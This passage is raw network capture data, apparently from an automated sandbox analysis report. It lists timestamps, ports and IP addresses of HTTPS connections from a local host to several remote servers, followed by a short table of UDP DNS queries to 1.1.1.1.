Dec 27, 2024 07:10:53.145513058 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.145540953 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.145692110 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.145776033 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.145919085 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.146033049 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.146150112 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.146178007 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.146279097 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.146409035 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.146545887 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.146666050 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.146795034 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.146944046 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.147806883 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.147957087 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.147993088 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.148088932 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.149034023 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.150882006 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.152241945 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.152271032 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.152288914 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.152296066 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.152307987 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.152373075 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.152421951 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.152683020 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.152738094 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.152745008 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.152762890 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.152806044 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.152841091 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.195347071 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.195755959 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.195790052 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.195808887 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.195852995 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.195862055 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.195879936 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.195904016 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.195951939 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.195975065 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.195981026 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.196001053 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.196662903 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.196851015 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.196868896 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.196872950 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.196897030 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.196947098 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.196955919 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.197320938 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.197335958 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.197352886 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.197360039 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.197375059 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.197392941 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.197400093 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.197412014 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.197417021 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.197428942 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.197438002 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.197453976 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.197470903 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.197490931 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.197495937 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.197505951 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.197511911 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.197515011 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.197546005 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.197549105 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.197572947 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.197582960 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.197591066 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.197597980 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.197621107 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.197673082 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.197693110 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.197766066 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.197809935 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.197829962 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.197869062 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.197917938 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.243331909 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.243503094 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.243531942 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.243568897 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.243586063 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.243602037 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.243616104 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.243840933 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.243861914 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.243870020 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.243887901 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.243925095 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.263422966 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.263686895 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.263706923 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.263725042 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.263783932 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.263793945 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.263803959 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.263839006 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.263880014 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.263896942 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.263932943 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.263958931 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.264003038 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.272010088 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.272233009 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.272245884 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.272262096 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.272273064 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.272350073 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.272356033 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.272452116 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.272469044 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.272480965 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.272492886 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.272562027 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.272579908 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.272598982 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.272610903 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.272620916 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.272648096 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.272676945 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.272689104 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.272732973 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.272742033 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.468619108 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.693512917 CET	443	50048	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.693578005 CET	50048	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.694014072 CET	50048	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.694020987 CET	443	50048	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.695689917 CET	50048	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:53.695696115 CET	443	50048	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:53.732295990 CET	50055	443	192.168.2.5	20.42.73.30
Dec 27, 2024 07:10:53.732335091 CET	443	50055	20.42.73.30	192.168.2.5
Dec 27, 2024 07:10:53.732634068 CET	50055	443	192.168.2.5	20.42.73.30
Dec 27, 2024 07:10:53.733129978 CET	50055	443	192.168.2.5	20.42.73.30
Dec 27, 2024 07:10:53.733148098 CET	443	50055	20.42.73.30	192.168.2.5
Dec 27, 2024 07:10:53.888751030 CET	50056	443	192.168.2.5	20.42.73.30
Dec 27, 2024 07:10:53.888787985 CET	443	50056	20.42.73.30	192.168.2.5
Dec 27, 2024 07:10:53.888844967 CET	50056	443	192.168.2.5	20.42.73.30
Dec 27, 2024 07:10:53.890433073 CET	50056	443	192.168.2.5	20.42.73.30
Dec 27, 2024 07:10:53.890448093 CET	443	50056	20.42.73.30	192.168.2.5
Dec 27, 2024 07:10:54.455502987 CET	443	50054	20.42.73.30	192.168.2.5
Dec 27, 2024 07:10:54.455801964 CET	50054	443	192.168.2.5	20.42.73.30
Dec 27, 2024 07:10:54.455830097 CET	443	50054	20.42.73.30	192.168.2.5
Dec 27, 2024 07:10:54.456178904 CET	443	50054	20.42.73.30	192.168.2.5
Dec 27, 2024 07:10:54.456486940 CET	50054	443	192.168.2.5	20.42.73.30
Dec 27, 2024 07:10:54.456557035 CET	443	50054	20.42.73.30	192.168.2.5
Dec 27, 2024 07:10:54.456650972 CET	50054	443	192.168.2.5	20.42.73.30
Dec 27, 2024 07:10:54.456705093 CET	50054	443	192.168.2.5	20.42.73.30
Dec 27, 2024 07:10:54.456742048 CET	443	50054	20.42.73.30	192.168.2.5
Dec 27, 2024 07:10:54.489846945 CET	443	50053	20.42.73.30	192.168.2.5
Dec 27, 2024 07:10:54.490082979 CET	50053	443	192.168.2.5	20.42.73.30
Dec 27, 2024 07:10:54.490106106 CET	443	50053	20.42.73.30	192.168.2.5
Dec 27, 2024 07:10:54.491079092 CET	443	50053	20.42.73.30	192.168.2.5
Dec 27, 2024 07:10:54.491384029 CET	50053	443	192.168.2.5	20.42.73.30
Dec 27, 2024 07:10:54.491483927 CET	443	50053	20.42.73.30	192.168.2.5
Dec 27, 2024 07:10:54.491530895 CET	50053	443	192.168.2.5	20.42.73.30
Dec 27, 2024 07:10:54.491585016 CET	50053	443	192.168.2.5	20.42.73.30
Dec 27, 2024 07:10:54.491615057 CET	443	50053	20.42.73.30	192.168.2.5
Dec 27, 2024 07:10:54.600527048 CET	443	50048	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:54.600553036 CET	443	50048	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:54.600589037 CET	50048	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:54.600613117 CET	443	50048	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:54.600625992 CET	443	50048	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:54.600627899 CET	50048	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:54.600660086 CET	50048	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:54.600680113 CET	50048	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:54.600919962 CET	50048	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:54.600930929 CET	443	50048	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:54.603707075 CET	50060	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:54.603740931 CET	443	50060	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:54.603857040 CET	50060	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:54.604027987 CET	50060	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:54.604041100 CET	443	50060	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:54.914959908 CET	443	50054	20.42.73.30	192.168.2.5
Dec 27, 2024 07:10:54.915028095 CET	443	50054	20.42.73.30	192.168.2.5
Dec 27, 2024 07:10:54.915096045 CET	50054	443	192.168.2.5	20.42.73.30
Dec 27, 2024 07:10:54.915651083 CET	50054	443	192.168.2.5	20.42.73.30
Dec 27, 2024 07:10:54.915663004 CET	443	50054	20.42.73.30	192.168.2.5
Dec 27, 2024 07:10:54.944624901 CET	443	50053	20.42.73.30	192.168.2.5
Dec 27, 2024 07:10:54.944725990 CET	443	50053	20.42.73.30	192.168.2.5
Dec 27, 2024 07:10:54.945110083 CET	50053	443	192.168.2.5	20.42.73.30
Dec 27, 2024 07:10:54.945137024 CET	443	50053	20.42.73.30	192.168.2.5
Dec 27, 2024 07:10:54.945147991 CET	50053	443	192.168.2.5	20.42.73.30
Dec 27, 2024 07:10:54.945230007 CET	50053	443	192.168.2.5	20.42.73.30
Dec 27, 2024 07:10:55.334148884 CET	443	50055	20.42.73.30	192.168.2.5
Dec 27, 2024 07:10:55.334521055 CET	50055	443	192.168.2.5	20.42.73.30
Dec 27, 2024 07:10:55.334532976 CET	443	50055	20.42.73.30	192.168.2.5
Dec 27, 2024 07:10:55.335567951 CET	443	50055	20.42.73.30	192.168.2.5
Dec 27, 2024 07:10:55.335638046 CET	50055	443	192.168.2.5	20.42.73.30
Dec 27, 2024 07:10:55.335906982 CET	50055	443	192.168.2.5	20.42.73.30
Dec 27, 2024 07:10:55.335964918 CET	443	50055	20.42.73.30	192.168.2.5
Dec 27, 2024 07:10:55.336057901 CET	50055	443	192.168.2.5	20.42.73.30
Dec 27, 2024 07:10:55.336065054 CET	443	50055	20.42.73.30	192.168.2.5
Dec 27, 2024 07:10:55.336086035 CET	50055	443	192.168.2.5	20.42.73.30
Dec 27, 2024 07:10:55.336137056 CET	443	50055	20.42.73.30	192.168.2.5
Dec 27, 2024 07:10:55.390078068 CET	50055	443	192.168.2.5	20.42.73.30
Dec 27, 2024 07:10:55.664647102 CET	443	50056	20.42.73.30	192.168.2.5
Dec 27, 2024 07:10:55.665009975 CET	50056	443	192.168.2.5	20.42.73.30
Dec 27, 2024 07:10:55.665023088 CET	443	50056	20.42.73.30	192.168.2.5
Dec 27, 2024 07:10:55.666115999 CET	443	50056	20.42.73.30	192.168.2.5
Dec 27, 2024 07:10:55.666182041 CET	50056	443	192.168.2.5	20.42.73.30
Dec 27, 2024 07:10:55.666637897 CET	50056	443	192.168.2.5	20.42.73.30
Dec 27, 2024 07:10:55.666704893 CET	443	50056	20.42.73.30	192.168.2.5
Dec 27, 2024 07:10:55.667120934 CET	50056	443	192.168.2.5	20.42.73.30
Dec 27, 2024 07:10:55.667197943 CET	50056	443	192.168.2.5	20.42.73.30
Dec 27, 2024 07:10:55.667217970 CET	443	50056	20.42.73.30	192.168.2.5
Dec 27, 2024 07:10:55.717614889 CET	50056	443	192.168.2.5	20.42.73.30
Dec 27, 2024 07:10:55.896792889 CET	443	50055	20.42.73.30	192.168.2.5
Dec 27, 2024 07:10:55.896874905 CET	443	50055	20.42.73.30	192.168.2.5
Dec 27, 2024 07:10:55.896930933 CET	50055	443	192.168.2.5	20.42.73.30
Dec 27, 2024 07:10:55.898260117 CET	50055	443	192.168.2.5	20.42.73.30
Dec 27, 2024 07:10:55.898266077 CET	443	50055	20.42.73.30	192.168.2.5
Dec 27, 2024 07:10:56.000412941 CET	443	50060	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:56.000478029 CET	50060	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:56.000899076 CET	50060	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:56.000905037 CET	443	50060	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:56.002732992 CET	50060	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:56.002738953 CET	443	50060	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:56.237059116 CET	443	50056	20.42.73.30	192.168.2.5
Dec 27, 2024 07:10:56.237287045 CET	443	50056	20.42.73.30	192.168.2.5
Dec 27, 2024 07:10:56.237344980 CET	50056	443	192.168.2.5	20.42.73.30
Dec 27, 2024 07:10:56.238270998 CET	50056	443	192.168.2.5	20.42.73.30
Dec 27, 2024 07:10:56.238276958 CET	443	50056	20.42.73.30	192.168.2.5
Dec 27, 2024 07:10:56.842504978 CET	443	49978	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:56.842601061 CET	443	49978	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:56.842689991 CET	49978	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:56.898269892 CET	443	49979	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:56.898325920 CET	443	49979	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:56.898749113 CET	49979	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:56.908373117 CET	443	50060	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:56.908396006 CET	443	50060	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:56.908457994 CET	50060	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:56.908457994 CET	50060	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:56.908461094 CET	443	50060	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:56.908564091 CET	50060	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:56.908655882 CET	50060	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:56.908675909 CET	443	50060	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:56.908684969 CET	50060	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:56.908735991 CET	50060	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:57.164491892 CET	49703	443	192.168.2.5	23.1.237.91
Dec 27, 2024 07:10:57.263432026 CET	50069	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:57.263474941 CET	443	50069	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:57.263596058 CET	50069	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:57.265069962 CET	50069	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:57.265093088 CET	443	50069	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:57.429310083 CET	443	49980	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:57.429380894 CET	443	49980	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:57.430151939 CET	49980	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:57.467195034 CET	443	49981	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:57.467253923 CET	443	49981	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:57.467463017 CET	49981	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:58.714859009 CET	443	50069	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:58.714930058 CET	50069	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:58.715291023 CET	50069	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:58.715296030 CET	443	50069	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:58.717159033 CET	50069	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:58.717159033 CET	50069	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:58.717165947 CET	443	50069	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:58.717180014 CET	443	50069	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:59.894288063 CET	443	50069	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:59.894362926 CET	50069	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:59.894366026 CET	443	50069	188.245.216.205	192.168.2.5
Dec 27, 2024 07:10:59.894440889 CET	50069	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:59.895906925 CET	50069	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:10:59.895925045 CET	443	50069	188.245.216.205	192.168.2.5
Dec 27, 2024 07:11:00.009449959 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:11:00.009520054 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:11:00.009536982 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:11:00.009586096 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:11:00.010523081 CET	50043	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:11:00.010541916 CET	443	50043	188.245.216.205	192.168.2.5
Dec 27, 2024 07:11:00.409461975 CET	50077	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:11:00.409478903 CET	443	50077	188.245.216.205	192.168.2.5
Dec 27, 2024 07:11:00.409540892 CET	50077	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:11:00.411780119 CET	50077	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:11:00.411793947 CET	443	50077	188.245.216.205	192.168.2.5
Dec 27, 2024 07:11:01.116673946 CET	49978	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:11:01.116707087 CET	443	49978	172.64.41.3	192.168.2.5
Dec 27, 2024 07:11:01.116715908 CET	49979	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:11:01.116733074 CET	443	49979	172.64.41.3	192.168.2.5
Dec 27, 2024 07:11:01.816104889 CET	443	50077	188.245.216.205	192.168.2.5
Dec 27, 2024 07:11:01.816189051 CET	50077	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:11:01.816675901 CET	50077	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:11:01.816684008 CET	443	50077	188.245.216.205	192.168.2.5
Dec 27, 2024 07:11:01.818325996 CET	50077	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:11:01.818331003 CET	443	50077	188.245.216.205	192.168.2.5
Dec 27, 2024 07:11:01.818372011 CET	50077	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:11:01.818382978 CET	443	50077	188.245.216.205	192.168.2.5
Dec 27, 2024 07:11:02.899806976 CET	443	50077	188.245.216.205	192.168.2.5
Dec 27, 2024 07:11:02.899885893 CET	443	50077	188.245.216.205	192.168.2.5
Dec 27, 2024 07:11:02.899888039 CET	50077	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:11:02.899933100 CET	50077	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:11:02.900713921 CET	50077	443	192.168.2.5	188.245.216.205
Dec 27, 2024 07:11:02.900727034 CET	443	50077	188.245.216.205	192.168.2.5
Dec 27, 2024 07:11:05.406378984 CET	443	49998	23.209.72.7	192.168.2.5
Dec 27, 2024 07:11:05.406471014 CET	443	49998	23.209.72.7	192.168.2.5
Dec 27, 2024 07:11:05.406527042 CET	49998	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:11:05.459965944 CET	443	49997	23.209.72.7	192.168.2.5
Dec 27, 2024 07:11:05.460040092 CET	443	49997	23.209.72.7	192.168.2.5
Dec 27, 2024 07:11:05.460110903 CET	49997	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:11:06.554466963 CET	49998	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:11:06.554503918 CET	443	49998	23.209.72.7	192.168.2.5
Dec 27, 2024 07:11:06.554508924 CET	49997	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:11:06.554522991 CET	443	49997	23.209.72.7	192.168.2.5
Dec 27, 2024 07:11:09.431571007 CET	443	50031	23.44.201.37	192.168.2.5
Dec 27, 2024 07:11:09.431648016 CET	443	50031	23.44.201.37	192.168.2.5
Dec 27, 2024 07:11:09.431807041 CET	50031	443	192.168.2.5	23.44.201.37
Dec 27, 2024 07:11:09.461357117 CET	443	50032	23.44.201.37	192.168.2.5
Dec 27, 2024 07:11:09.461539984 CET	443	50032	23.44.201.37	192.168.2.5
Dec 27, 2024 07:11:09.461602926 CET	50032	443	192.168.2.5	23.44.201.37

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 27, 2024 07:09:24.440046072 CET	57462	53	192.168.2.5	1.1.1.1
Dec 27, 2024 07:09:24.770004034 CET	53	57462	1.1.1.1	192.168.2.5
Dec 27, 2024 07:09:39.314806938 CET	58905	53	192.168.2.5	1.1.1.1
Dec 27, 2024 07:09:39.451478004 CET	53	58905	1.1.1.1	192.168.2.5
Dec 27, 2024 07:09:41.891535997 CET	61330	53	192.168.2.5	1.1.1.1
Dec 27, 2024 07:09:42.369208097 CET	53	61330	1.1.1.1	192.168.2.5
Dec 27, 2024 07:09:58.228933096 CET	53	52138	1.1.1.1	192.168.2.5
Dec 27, 2024 07:09:58.232934952 CET	61320	53	192.168.2.5	1.1.1.1
Dec 27, 2024 07:09:58.233182907 CET	49231	53	192.168.2.5	1.1.1.1
Dec 27, 2024 07:09:58.468056917 CET	53	59968	1.1.1.1	192.168.2.5
Dec 27, 2024 07:09:58.468173981 CET	53	61320	1.1.1.1	192.168.2.5
Dec 27, 2024 07:09:58.468203068 CET	53	49231	1.1.1.1	192.168.2.5
Dec 27, 2024 07:10:01.545883894 CET	53	51508	1.1.1.1	192.168.2.5
Dec 27, 2024 07:10:02.996052027 CET	53	49160	1.1.1.1	192.168.2.5
Dec 27, 2024 07:10:03.357918024 CET	53	65025	1.1.1.1	192.168.2.5
Dec 27, 2024 07:10:33.357306004 CET	60844	53	192.168.2.5	1.1.1.1
Dec 27, 2024 07:10:33.373766899 CET	54280	53	192.168.2.5	1.1.1.1
Dec 27, 2024 07:10:33.511389971 CET	53	54280	1.1.1.1	192.168.2.5
Dec 27, 2024 07:10:35.744559050 CET	59233	53	192.168.2.5	1.1.1.1
Dec 27, 2024 07:10:35.745157003 CET	56930	53	192.168.2.5	1.1.1.1
Dec 27, 2024 07:10:37.478427887 CET	54156	53	192.168.2.5	1.1.1.1
Dec 27, 2024 07:10:37.478605032 CET	57437	53	192.168.2.5	1.1.1.1
Dec 27, 2024 07:10:37.615874052 CET	53	54156	1.1.1.1	192.168.2.5
